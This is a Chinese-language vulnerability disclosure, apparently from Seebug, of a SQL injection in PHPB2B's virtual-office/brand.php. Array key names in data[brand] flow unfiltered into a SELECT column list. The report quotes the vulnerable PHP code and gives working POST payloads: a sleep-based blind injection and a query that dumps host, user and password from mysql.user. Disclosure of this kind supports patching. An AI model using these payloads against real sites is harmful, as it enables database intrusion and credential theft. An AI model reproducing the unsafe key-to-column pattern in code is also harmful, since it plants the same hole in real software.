### 简要描述:
SQL注入#2
### 详细说明:
```
注入链接:/virtual-office/brand.php
注入参数:data[brand]
漏洞代码:(第24行开始)
if (isset($_POST['save']) && !empty($company_id)) {
$company->newCheckStatus($companyinfo['status']);
if(!empty($_POST['data']['brand'])){
$vals = $_POST['data']['brand'];
if(isset($_POST['id'])){
$id = intval($_POST['id']);
}
$attachment->rename_file = "brand-".($brand->getMaxId()+1);
if(!empty($id)){
$attachment->insert_new = false;
$attachment->rename_file = "brand-".$id;
}
if (!empty($_FILES['pic']['name'])) {
$attachment->upload_process();
$vals['picture'] = $attachment->file_full_url;
}
if (!empty($vals['description'])) {
$vals['description'] = stripcslashes($vals['description']);
}
$vals['letter'] = L10n::getinitial($vals['name']);
$vals['member_id'] = $the_memberid;
$vals['company_id'] = $company_id;
if (!empty($id)) {
$vals['modified'] = $time_stamp;
$res = $brand->save($vals, "update", $id, null, $conditions);
$vals = $_POST['data']['brand'];从data['brand']中获取job数组参数,并将$vals数组传入save函数,save函数中通过以下以下代码构造SQL语句:(libraries/core/model.php)
$keys = array_keys($posts);
$cols = implode($keys,",");
$tbname = (is_null($tbname))? $this->getTable():trim($tbname);
$this->table_name = $tbname;
if(!empty($id)){
$sql = "SELECT $cols FROM ".$tbname." WHERE ".$this->primaryKey."='".$id."'";
在save函数中$vals数组的键名会被拆分为select语句的列名列表$cols,由于$vals可控导致sql注入,且是数组键名,因此可绕过代码中的注入检测
```
### 漏洞证明:
```
漏洞测试:
http://127.0.0.1/phpb2b/virtual-office/brand.php
Post:
data[brand][if((length(user())>61),1,sleep(5))%23]=1&save=1
为了方便调试,在代码里把执行的SQL语句打印出来
```
[<img src="https://images.seebug.org/upload/201502/0911315253cf464b34459c3c7fa542cb47280f89.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/0911315253cf464b34459c3c7fa542cb47280f89.png)
```
Mysql日志:
```
[<img src="https://images.seebug.org/upload/201502/09113137b78b6ad970679eed94aa1a8908b26e60.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/09113137b78b6ad970679eed94aa1a8908b26e60.png)
```
成功执行延时注入
可无视SQL注入检测,执行任意SQL语句
http://127.0.0.1/phpb2b/virtual-office/brand.php
Post:
data[brand][host,user,password/**/from/**/mysql.user/**/where/**/1>0/**/limit/**/0,1%23]=1&save=1
```
[<img src="https://images.seebug.org/upload/201502/091131272c18944721a567463843895c7a3f5857.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/091131272c18944721a567463843895c7a3f5857.png)
```
Mysql日志:
```
[<img src="https://images.seebug.org/upload/201502/091131190bd970f7292c1f3427e0f77e33c4b7df.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/091131190bd970f7292c1f3427e0f77e33c4b7df.png)
```
```
京公网安备 11010502034610号
暂无评论